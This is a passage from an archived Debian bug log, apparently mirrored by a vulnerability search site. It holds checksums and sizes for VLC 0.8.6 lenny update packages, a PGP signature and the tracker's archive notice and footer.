217c9534ff983550f1b954d5e640b919 4994140 net optional vlc-nox_0.8.6.h-1+lenny1_i386.deb 5f963735d300f179d6ba9f4fec8e94fc 461398 libs optional libvlc0_0.8.6.h-1+lenny1_i386.deb a4087e43d2bd9a9c0490575832f7e49f 479384 libdevel optional libvlc0-dev_0.8.6.h-1+lenny1_i386.deb 1496125ee4cbc841d1bf4115ab4eedf9 5264 graphics optional vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb 1ab8ccd14a53a87161fde3041659fdd4 11112 graphics optional vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb 10b5ee98dcc2fd5a51bbe1e4e5509851 6132 graphics optional vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb 895cac6f82e558854c66f8788f93db32 4268 graphics optional vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb e2ff41c933a2ff0c04819daf5187061a 4394 graphics optional vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb 445ee65daca298e8498d63f52de51334 36996 graphics optional mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb a81b738ecfa5eeacd81736b91757b7e4 4866 graphics optional vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb 361c1b7c9d410b068df4ef99ac132ad9 5164 graphics optional vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkjNHHAACgkQ62zWxYk/rQd0ZACfaHpQrS3/LCGqp5S9O5MHxK0X G3MAoIWZJEDFiW5tr4dI5SeCes+gKYAV =DAXB -----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Tue, 14 Oct 2008 07:32:12 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.
Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.